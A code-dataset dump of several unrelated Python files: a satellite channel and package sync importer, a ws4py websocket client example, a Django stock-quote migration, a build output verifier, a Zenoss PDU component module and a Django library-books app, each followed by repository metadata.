handler = xmlSource.SatelliteDispatchHandler()
handler.set_container(container)
return handler
class ChannelContainer(SyncHandlerContainer, xmlSource.ChannelContainer):
collection = ChannelCollection
def get_channel_handler():
return get_sync_handler(ChannelContainer())
def import_channels(channels, orgid=None, master=None):
collection = ChannelCollection()
batch = []
org_map = None
my_backend = diskImportLib.get_backend()
if master:
org_map = my_backend.lookupOrgMap(master)['master-id-to-local-id']
for c in channels:
try:
timestamp = collection.get_channel_timestamp(c)
except KeyError:
raise_with_tb(Exception("Could not find channel %s" % c), sys.exc_info()[2])
c_obj = collection.get_channel(c, timestamp)
if c_obj is None:
raise Exception("Channel not found in cache: %s" % c)
# Check to see if we're asked to sync to an orgid,
# make sure the org from the export is not null org,
# finally if the orgs differ so we might wanna use
# requested org's channel-family.
# TODO: Move these checks somewhere more appropriate
if not orgid and c_obj['org_id'] is not None:
# If the src org is not present default to org 1
orgid = DEFAULT_ORG
if orgid is not None and c_obj['org_id'] is not None and \
c_obj['org_id'] != orgid:
# If we know the master this is coming from and the master org
# has been mapped to a local org, transform org_id to the local
# org_id. Otherwise just put it in the default org.
if (org_map and c_obj['org_id'] in list(org_map.keys())
and org_map[c_obj['org_id']]):
c_obj['org_id'] = org_map[c_obj['org_id']]
else:
c_obj['org_id'] = orgid
if c_obj.has_key('trust_list'):
del(c_obj['trust_list'])
for family in c_obj['families']:
family['label'] = 'private-channel-family-' + \
str(c_obj['org_id'])
# If there's a trust list on the channel, transform the org ids to
# the local ones
if c_obj.has_key('trust_list') and c_obj['trust_list']:
trusts = []
for trust in c_obj['trust_list']:
if trust['org_trust_id'] in org_map:
trust['org_trust_id'] = org_map[trust['org_trust_id']]
trusts.append(trust)
c_obj['trust_list'] = trusts
syncLib.log(6, "Syncing Channel %s to Org %s " % (c_obj['label'], c_obj['org_id']))
batch.append(c_obj)
importer = channelImport.ChannelImport(batch, my_backend)
# Don't commit just yet
importer.will_commit = 0
importer.run()
return importer
# Singleton-like
class ShortPackageCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._cache = None
self._init_cache()
def _init_cache(self):
self._cache = syncCache.ShortPackageCache()
def add_item(self, package):
"""Stores a package in the collection"""
self._cache.cache_set(package['package_id'], package)
def get_package(self, package_id):
"""Return the package with the specified id from the collection"""
return self._cache.cache_get(package_id)
def has_package(self, package_id):
"""Returns true if the package exists in the collection"""
return self._cache.cache_has_key(package_id)
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
class ShortPackageContainer(SyncHandlerContainer, xmlSource.IncompletePackageContainer):
collection = ShortPackageCollection
def get_short_package_handler():
return get_sync_handler(ShortPackageContainer())
class PackageCollection(ShortPackageCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.PackageCache()
def get_package_timestamp(self, package_id):
raise NotImplementedError
class PackageContainer(SyncHandlerContainer, xmlSource.PackageContainer):
collection = PackageCollection
def get_package_handler():
return get_sync_handler(PackageContainer())
# Singleton-like
class SourcePackageCollection(ShortPackageCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.SourcePackageCache()
class SourcePackageContainer(SyncHandlerContainer, xmlSource.SourcePackageContainer):
collection = SourcePackageCollection
def get_source_package_handler():
return get_sync_handler(SourcePackageContainer())
# Singleton-like
class ErrataCollection:
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
if not list(self._shared_state.keys()):
self._errata_hash = {}
self._cache = None
self._init_cache()
def _init_cache(self):
self._cache = syncCache.ErratumCache()
def add_item(self, erratum):
"""Stores an erratum in the collection"""
erratum_id = erratum['erratum_id']
timestamp = _to_timestamp(erratum['last_modified'])
self._errata_hash[erratum_id] = timestamp
self._cache.cache_set(erratum_id, erratum, timestamp=timestamp)
def get_erratum_timestamp(self, erratum_id):
"""Returns the erratum's timestamp"""
if erratum_id not in self._errata_hash:
raise KeyError("Erratum %s could not be found" % erratum_id)
return self._errata_hash[erratum_id]
def get_erratum(self, erratum_id, timestamp):
"""Return the erratum with the specified id and timestamp from the
collection. Note that timestamp can be None, in which case no timetamp
matching is performed"""
return self._cache.cache_get(erratum_id, timestamp=timestamp)
def has_erratum(self, erratum_id, timestamp):
"""Returns true if the erratum exists in the collection"""
return self._cache.cache_has_key(erratum_id, timestamp=timestamp)
def reset(self):
"""Reset the collection"""
self._shared_state.clear()
self.__init__()
class ErrataContainer(SyncHandlerContainer, xmlSource.ErrataContainer):
collection = ErrataCollection
def get_errata_handler():
return get_sync_handler(ErrataContainer())
class KickstartableTreesCollection(BaseCollection):
_shared_state = {}
def _init_cache(self):
self._cache = syncCache.KickstartableTreesCache()
def _get_item_id(self, item):
return item['label']
def _get_item_timestamp(self, item):
return None
class KickstartableTreesContainer(SyncHandlerContainer, xmlSource.KickstartableTreesContainer):
collection = KickstartableTreesCollection
def get_kickstarts_handler():
return get_sync_handler(KickstartableTreesContainer())
def import_packages(batch, sources=0):
importer = packageImport.PackageImport(batch, diskImportLib.get_backend(), sources)
importer.setUploadForce(4)
importer.run()
importer.status()
return importer
def link_channel_packages(batch, strict=1):
importer = packageImport.ChannelPackageSubscription(batch,
diskImportLib.get_backend(),
caller="satsync.linkPackagesToChannels", strict=strict)
importer.run()
importer.status()
return importer
def import_errata(batch):
importer = errataImport.ErrataImport(batch, diskImportLib.get_backend())
importer.ignoreMissing = 1
importer.run()
importer.status()
return importer
def import_kickstarts(batch):
importer = kickstartImport.KickstartableTreeImport(batch,
diskImportLib.get_backend())
importer.run()
importer.status()
return importer
def _to_timestamp(t):
if isinstance(t, usix.IntType):
# Already an int
return t
# last_modified is YYYY-MM-DD HH24:MI:SS
    # The cache expects YYYYMMDDHH24MISS as the format, so just drop the
    # spaces, dashes and colons
# python 2.4 can't handle t.translate(None, ' -:')
last_modified = t.translate(string.maketrans("", ""), ' -:')
return last_modified
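# Example of the conversion (Python 2 string semantics, as assumed by the
# surrounding code):
#   _to_timestamp('2011-02-03 10:20:30')  ->  '20110203102030'
#   _to_timestamp(1296728430)             ->  1296728430  (ints pass through)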
# Generic container handler
class ContainerHandler:
"""generate and set container XML handlers"""
def __init__(self, master_label, create_orgs=False):
self.handler = xmlSource.SatelliteDispatchHandler()
# arch containers
self.setServerArchContainer()
self.setPackageArchContainer()
self.setChannelArchContainer()
self.setCPUArchContainer()
self.setServerPackageArchContainer()
self.setServerChannelArchContainer()
self.setServerGroupServerArchContainer()
self.setChannelPackageArchContainer()
# all other containers
self.setChannelFamilyContainer()
self.setProductNamesContainer()
self.setOrgContainer(master_label, create_orgs)
def __del__(self):
self.handler.close() # kill the circular reference.
def close(self):
self.handler.close() # kill the circular reference.
def clear(self):
self.handler.clear() # clear the batch
# basic functionality:
def process(self, stream):
self.handler.process(stream)
def reset(self):
self.handler.reset()
def getHandler(self):
return self.handler
# set arch containers:
def setServerArchContainer(self):
self.handler.set_container(diskImportLib.ServerArchContainer())
def setPackageArchContainer(self):
self.handler.set_container(diskImportLib.PackageArchContainer())
def setChannelArchContainer(self):
self.handler.set_container(diskImportLib.ChannelArchContainer())
def setCPUArchContainer(self):
self.handler.set_container(diskImportLib.CPUArchContainer())
def setServerPackageArchContainer(self):
self.handler.set_container(diskImportLib.ServerPackageArchCompatContainer())
def setServerChannelArchContainer(self):
self.handler.set_container(diskImportLib.ServerChannelArchCompatContainer())
def setServerGroupServerArchContainer(self):
self.handler.set_container(diskImportLib.ServerGroupServerArchCompatContainer())
def setChannelPackageArchContainer(self):
self.handler.set_container(ChannelPackageArchCompatContainer())
# set all other containers:
def setChannelFamilyContainer(self):
self.handler.set_container(ChannelFamilyContainer())
def setProductNamesContainer(self):
self.handler.set_container(diskImportLib.ProductNamesContainer())
def setOrgContainer(self, master_label, create_orgs):
# pylint: disable=E1101,E1103
self.handler.set_container(diskImportLib.OrgContainer())
self.handler.get_container('rhn-orgs').set_master_and_create_org_args(
master_label, create_orgs)
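# Usage sketch (hypothetical export stream; the real callers live elsewhere
# in satsync):
#   handler = ContainerHandler('master.example.com')
#   stream = open('export.xml')
#   try:
#       handler.process(stream)
#   finally:
#       stream.close()
#   handler.close()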
#
# more containers
#
# NOTE: we use *most of* the Arch Containers from diskImportLib.py
# this one is used simply to print out the arches.
class ChannelPackageArchCompatContainer(diskImportLib.ChannelPackageArchCompatContainer):
arches = {}
def endItemCallback(self):
diskImportLib.ChannelPackageArchCompatContainer.endItemCallback(self)
if not self.batch:
return
self.arches[self.batch[-1]['package-arch']] = 1
    def endContainerCallback(self):
        # log the arches we saw, in sorted order
        for arch in sorted(self.arches):
            syncLib.log(6, ' parsed arch: %s' % (arch))
        diskImportLib.ChannelPackageArchCompatContainer.endContainerCallback(self)
class ChannelFamilyContainer(xmlSource.ChannelFamilyContainer):
def endItemCallback(self):
xmlSource.ChannelFamilyContainer.endItemCallback(self)
if not self.batch:
return
syncLib.log(2, ' parsing family: %s' % (self.batch[-1]['name']))
def endContainerCallback(self):
batch = self.batch
# use the copy only; don't want a persistent self.batch
self.batch = []
importer = channelImport.ChannelFamilyImport(batch,
diskImportLib.get_backend())
importer.run()
| gpl-2.0 | -8,960,262,656,581,139,000 | 31.698962 | 111 | 0.644868 | false | 4.07943 | false | false | false |
OptimalBPM/WebSocket-for-Python | example/bug167_client.py | 5 | 1625 | def run_threaded():
from ws4py.client.threadedclient import WebSocketClient
class EchoClient(WebSocketClient):
def opened(self):
self.send("hello")
def closed(self, code, reason=None):
print(("Closed down", code, reason))
def received_message(self, m):
print(m)
self.close()
    ws = EchoClient('wss://localhost:9000/ws')
    try:
        ws.connect()
ws.run_forever()
except KeyboardInterrupt:
ws.close()
def run_tornado():
from tornado import ioloop
from ws4py.client.tornadoclient import TornadoWebSocketClient
class MyClient(TornadoWebSocketClient):
def opened(self):
self.send("hello")
def closed(self, code, reason=None):
print(("Closed down", code, reason))
ioloop.IOLoop.instance().stop()
def received_message(self, m):
print(m)
self.close()
ws = MyClient('wss://localhost:9000/ws')
ws.connect()
ioloop.IOLoop.instance().start()
def run_gevent():
from gevent import monkey; monkey.patch_all()
import gevent
from ws4py.client.geventclient import WebSocketClient
ws = WebSocketClient('wss://localhost:9000/ws')
ws.connect()
ws.send("hello")
def incoming():
while True:
m = ws.receive()
if m is not None:
print(m)
else:
break
ws.close()
gevent.joinall([gevent.spawn(incoming)])
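# Exercise one client style at a time: each call below blocks until its
# socket closes, so run_tornado() only starts once run_threaded() returns.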
#run_gevent()
run_threaded()
run_tornado()
| bsd-3-clause | 2,127,205,877,635,809,500 | 24 | 65 | 0.561231 | false | 4.145408 | false | false | false |
aneumeier/stocks | portfolio/migrations/0001_initial.py | 2 | 1885 | # encoding: utf8
from __future__ import unicode_literals
from django.db import models, migrations
def initial_data(apps, schema_editor):
Symbol = apps.get_model('portfolio', 'Symbol')
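    # Placeholder data hook: the historical model is resolved, but no rows
    # are seeded. A hypothetical seeding call would look like:
    #   Symbol.objects.create(name='Example Corp', slug='example-corp')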
return
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Symbol',
fields=[
(
'id',
models.AutoField(
verbose_name='ID',
serialize=False,
auto_created=True,
primary_key=True)
),
('name', models.CharField(max_length=32)),
('slug', models.SlugField(default="")),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Quote',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('symbol', models.ForeignKey(to='portfolio.Symbol', to_field='id')),
('date', models.DateField()),
('adj_close', models.DecimalField(max_digits=32, decimal_places=30)),
('closed', models.DecimalField(max_digits=32, decimal_places=30)),
('high', models.DecimalField(max_digits=32, decimal_places=30)),
('low', models.DecimalField(max_digits=32, decimal_places=30)),
('opened', models.DecimalField(max_digits=32, decimal_places=30)),
('volume', models.DecimalField(max_digits=32, decimal_places=30)),
],
options={
'unique_together': set([(b'symbol', b'date')]),
},
bases=(models.Model,),
),
migrations.RunPython(initial_data),
]
| agpl-3.0 | -5,571,421,897,167,403,000 | 34.566038 | 114 | 0.501326 | false | 4.642857 | false | false | false |
ARM-software/bob-build | tests/output/verify.py | 1 | 1459 | #!/bin/env python
# Copyright 2019 Arm Limited.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import sys
import os
import platform
parser = argparse.ArgumentParser(description='Verify the name of a generated output file.')
parser.add_argument('--out')
parser.add_argument('--expected')
group = parser.add_mutually_exclusive_group()
group.add_argument('--shared', help='use .so or .dylib extension', action='store_true')
group.add_argument('--static', help='use .a extension', action='store_true')
args = parser.parse_args()
if args.shared:
if platform.system() == 'Darwin':
extension = '.dylib'
else:
extension = '.so'
elif args.static:
extension = '.a'
else:
extension = ''
expected = args.expected + extension
if os.path.basename(args.out) != expected:
print("Output from generation: {} but expected: {}".format(args.out, expected))
sys.exit(1)
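# Example invocation (illustrative paths; on Linux, --shared maps to '.so'):
#   verify.py --out build/libs/libfoo.so --expected libfoo --shared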
| apache-2.0 | 6,177,579,979,156,486,000 | 29.395833 | 87 | 0.717615 | false | 3.770026 | false | false | false |
zenoss/Community-Zenpacks | ZenPacks.ZenSystems.ApcPdu/ZenPacks/ZenSystems/ApcPdu/info.py | 3 | 1485 | ##########################################################################
# Author: Jane Curry, jane.curry@skills-1st.co.uk
# Date: February 3rd, 2011
# Revised:
#
# info.py for ApcPdu ZenPack
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
################################################################################
__doc__ = """info.py
Representation of ApcPdu components.
$Id: info.py,v 1.2 2010/12/14 20:45:46 jc Exp $"""
__version__ = "$Revision: 1.4 $"[11:-2]
from zope.interface import implements
from Products.Zuul.infos import ProxyProperty
from Products.Zuul.infos.component import ComponentInfo
from Products.Zuul.decorators import info
from ZenPacks.ZenSystems.ApcPdu import interfaces
class ApcPduOutletInfo(ComponentInfo):
implements(interfaces.IApcPduOutletInfo)
outNumber = ProxyProperty("outNumber")
outName = ProxyProperty("outName")
outState = ProxyProperty("outState")
outBank = ProxyProperty("outBank")
class ApcPduBankInfo(ComponentInfo):
implements(interfaces.IApcPduBankInfo)
bankNumber = ProxyProperty("bankNumber")
bankState = ProxyProperty("bankState")
bankStateText = ProxyProperty("bankStateText")
class ApcPduPSInfo(ComponentInfo):
implements(interfaces.IApcPduPSInfo)
supply1Status = ProxyProperty("supply1Status")
supply2Status = ProxyProperty("supply2Status")
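# Each ProxyProperty above simply forwards attribute access to the underlying
# persistent component object, keeping these Info adapters purely declarative.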
| gpl-2.0 | -2,358,501,561,546,443,000 | 28.7 | 80 | 0.660606 | false | 3.69403 | false | false | false |
melkisedek/sen_project | src/books/models.py | 1 | 2286 | from django.db import models
from datetime import datetime, timedelta
from django.utils import timezone
from django.conf import settings
from django.core.urlresolvers import reverse
# Create your models here.
class Author(models.Model):
first_name = models.CharField(max_length=60)
last_name = models.CharField(max_length=60)
email = models.EmailField(blank=True)
def __str__(self):
return self.first_name + ' ' + self.last_name
class Publisher(models.Model):
"""docstring for Publisher"""
name = models.CharField(max_length=200)
address = models.TextField(blank=True)
website = models.URLField(blank=True)
def __str__(self):
return self.name
class Book(models.Model):
name = models.CharField(max_length=200)
edition = models.SmallIntegerField(default=1)
authors = models.ManyToManyField(Author, blank=True)
publisher = models.ManyToManyField(Publisher, blank=True)
    published = models.PositiveSmallIntegerField(null=True, blank=True)  # may be left blank, so allow NULL at the DB level
pages = models.IntegerField(default=0)
    isbn_10 = models.BigIntegerField(default=0, help_text="Do not include dashes")
    isbn_13 = models.BigIntegerField(default=0, help_text="Do not include dashes")
description = models.TextField()
    cover_image = models.ImageField('cover image',
upload_to='cover_pics/%Y-%m-%d/',
null=True,
blank=True)
date_added = models.DateTimeField(default=datetime.now)
available = models.BooleanField(default=True)
# this method causes a button labelled "View on site" to
# appear in the top right-hand side in book admin page.
def get_absolute_url(self):
return reverse('books:book_detail', args=[self.id])
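    # The reverse() call above assumes a namespaced URLconf entry roughly like
    # (hypothetical): url(r'^(\d+)/$', views.book_detail, name='book_detail')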
    def __str__(self):
        # 11th, 12th and 13th are special cases; otherwise the ordinal
        # suffix follows the last digit (1st, 2nd, 3rd, 21st, 22nd, ...).
        if self.edition % 100 in (11, 12, 13):
            nth = "th"
        elif self.edition % 10 == 1:
            nth = "st"
        elif self.edition % 10 == 2:
            nth = "nd"
        elif self.edition % 10 == 3:
            nth = "rd"
        else:
            nth = "th"
        return self.name + ", " + str(self.edition) + nth + " Edition"
    def was_added_recently(self):
        # 'datetime' here is the class imported from the datetime module, so
        # timedelta must be imported directly (see the imports above).
        return self.date_added >= timezone.now() - timedelta(days=30)
class Loaned(models.Model):
loaned_by = models.ForeignKey(settings.AUTH_USER_MODEL)
book = models.ForeignKey(Book)
timestamp = models.DateTimeField(auto_now_add=True)
returned = models.BooleanField(default=False)
def __str__(self):
return self.book.name
class Meta:
verbose_name = "Loaned Book"
| mit | 2,984,121,168,891,878,400 | 32.617647 | 75 | 0.706912 | false | 3.327511 | false | false | false |